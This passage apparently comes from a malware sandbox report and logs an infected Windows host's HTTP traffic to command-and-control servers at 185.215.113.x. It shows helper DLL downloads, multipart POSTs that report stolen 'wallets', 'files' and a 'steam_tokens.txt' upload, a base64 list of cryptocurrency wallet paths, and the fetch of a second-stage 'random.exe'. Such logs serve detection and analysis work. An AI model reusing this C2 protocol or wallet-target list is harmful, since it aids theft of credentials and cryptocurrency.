00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 11, 2024 01:14:17.644421101 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 11, 2024 01:14:17.928720951 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:17 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Nov 11, 2024 01:14:17.966825008 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 11, 2024 01:14:18.251424074 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:18 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Nov 11, 2024 01:14:18.728028059 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDG Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 01:14:19.522284985 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 01:14:19.591172934 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAEHDBAAECBFHJKFCFB Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 2d 2d 0d 0a Data Ascii: ------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="message"wallets------GCAEHDBAAECBFHJKFCFB--
Nov 11, 2024 01:14:19.877294064 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:19 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Nov 11, 2024 01:14:19.879910946 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJEC Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 2d 2d 0d 0a Data Ascii: ------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="message"files------DHCBAEHJJJKKFIDGHJEC--
Nov 11, 2024 01:14:20.166243076 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 01:14:20.178354025 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFHJJDHJEGHJKECBGCF Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------KKFHJJDHJEGHJKECBGCFContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------KKFHJJDHJEGHJKECBGCFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KKFHJJDHJEGHJKECBGCFContent-Disposition: form-data; name="file"------KKFHJJDHJEGHJKECBGCF--
Nov 11, 2024 01:14:20.960069895 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 01:14:20.991863012 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDAEBGIDBGHIECBGHJD Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 2d 2d 0d 0a Data Ascii: ------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="message"ybncbhylepme------EGDAEBGIDBGHIECBGHJD--
Nov 11, 2024 01:14:21.278198004 CET	271	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=
Nov 11, 2024 01:14:23.617027044 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFC Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 2d 2d 0d 0a Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BGDAAKJJDAAKFHJKJKFC--
Nov 11, 2024 01:14:24.400552034 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=85 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49762	185.215.113.16	80	7312	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:14:21.287739038 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Nov 11, 2024 01:14:22.212980032 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 00:14:22 GMT Content-Type: application/octet-stream Content-Length: 3258368 Last-Modified: Sun, 10 Nov 2024 23:54:02 GMT Connection: keep-alive ETag: "6731479a-31b800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 c0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@1(2@Wk11 @.rsrc@.idata @sxcussbd+*@nssdjnnb11@.taggant01"1@
Nov 11, 2024 01:14:22.213047981 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:14:22.213064909 CET	424	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:14:22.213078976 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:14:22.213090897 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ;)N$
Nov 11, 2024 01:14:22.213104010 CET	1236	IN	Data Raw: 10 03 fd 11 11 3b 65 15 46 e7 cd 8e c3 65 cf 66 f9 66 f8 b1 44 8d c1 0e c4 a0 80 66 59 57 9f 28 10 03 1d 11 11 3b 65 b5 46 e7 cd 8e 23 65 cf 66 f9 66 f8 b1 44 8d c1 0e fc a0 80 66 59 d7 a7 28 10 03 3d 11 11 3b 65 55 47 e7 cd 8e 03 65 cf 66 f9 66 Data Ascii: ;eFeffDfYW(;eF#effDfY(=;eUGeffDfY(];eGcdffDfY(};eGCdffDfY(;e5@dffDfY(;e@dffDfY(;euAdff
Nov 11, 2024 01:14:22.213114977 CET	136	IN	Data Raw: 44 8d a9 0e 74 a1 80 66 59 f3 90 28 10 03 dd 0e 11 3b 65 75 75 e7 cd 8e e3 78 cf 66 f9 66 f8 b1 44 8d bd 0e 14 a1 80 66 59 17 9b 28 10 03 fd 0e 11 3b 65 15 75 e7 cd 8e c3 78 cf 66 f9 66 f8 b1 44 8d b1 0e 00 a2 80 66 59 97 99 28 10 03 1d 0e 11 3b Data Ascii: DtfY(;euuxffDfY(;euxffDfY(;eu#xffD(fY(=;eUvxffDf
Nov 11, 2024 01:14:22.213126898 CET	1236	IN	Data Raw: 59 6f 9d 28 10 03 5d 0e 11 3b 65 f5 76 e7 cd 8e 63 7f cf 66 f9 66 f8 b1 44 8d c5 0e c4 a2 80 66 59 5b 92 28 10 03 7d 0e 11 3b 65 95 76 e7 cd 8e 43 7f cf 66 f9 66 f8 b1 44 8d b1 0e f8 a2 80 66 59 4f 90 28 10 03 9d 0f 11 3b 65 35 77 e7 cd 8e a3 7f Data Ascii: Yo(];evcffDfY[(};evCffDfYO(;e5wffDfY(;ewffDfY(;eupffDfY(;epffDfYw(;ep#ffDTfY(=;eUq
Nov 11, 2024 01:14:22.213139057 CET	212	IN	Data Raw: f9 66 f8 b1 44 8d bd 0e 5c ae 80 66 59 df 9c 28 10 03 3d 0b 11 3b 65 55 65 e7 cd 8e 03 73 cf 66 f9 66 f8 b1 44 8d c1 0e 48 ae 80 66 59 af 9e 28 10 03 5d 0b 11 3b 65 f5 65 e7 cd 8e 63 72 cf 66 f9 66 f8 b1 44 8d c1 0e 40 ae 80 66 59 4f 99 28 10 03 Data Ascii: fD\fY(=;eUesffDHfY(];eecrffD@fYO(};eeCrffDxfYW(;e5frffDdfY(;efrffDfY(;eugrffDfYG(
Nov 11, 2024 01:14:22.213148117 CET	1236	IN	Data Raw: 11 3b 65 15 67 e7 cd 8e c3 72 cf 66 f9 66 f8 b1 44 8d b9 0e dc af 80 66 59 0f 9b 28 10 03 1d 04 11 3b 65 b5 67 e7 cd 8e 23 72 cf 66 f9 66 f8 b1 44 8d b9 0e cc af 80 66 59 f7 9c 28 10 03 3d 04 11 3b 65 55 60 e7 cd 8e 03 72 cf 66 f9 66 f8 b1 44 8d Data Ascii: ;egrffDfY(;eg#rffDfY(=;eU`rffDfY/(];e`cqffDfYG(};e`CqffDfYG(;e5aqffDfYo(;eaqffDXfY(;eubqffD
Nov 11, 2024 01:14:22.217976093 CET	1236	IN	Data Raw: 8b 64 62 76 7e e4 c1 af d1 27 7d e4 cd 3b 02 64 9c 21 80 66 53 6f f8 b1 44 6f f8 b1 44 94 e5 84 81 24 cd 3d 53 6f f8 b1 44 6f f8 b1 44 90 46 91 fe 3a 53 6d 8b 34 72 8d 08 54 cf 66 93 67 c4 f3 4e 99 68 ab 0c 3b f9 b1 44 6f f8 b1 44 90 46 91 fe ae Data Ascii: dbv~'};d!fSoDoD$=SoDoDF:Sm4rTfgNh;DoDFPm?oh=<dj$L#FDoDoDoDF:d};f,y0[M8(.e;#(;f$DoDoDoDF7[:;f5hkoDFv{;/o f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49825	185.215.113.43	80	7956	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:15:05.490145922 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 11, 2024 01:15:06.417376041 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 00:15:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49838	185.215.113.43	80	7956	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
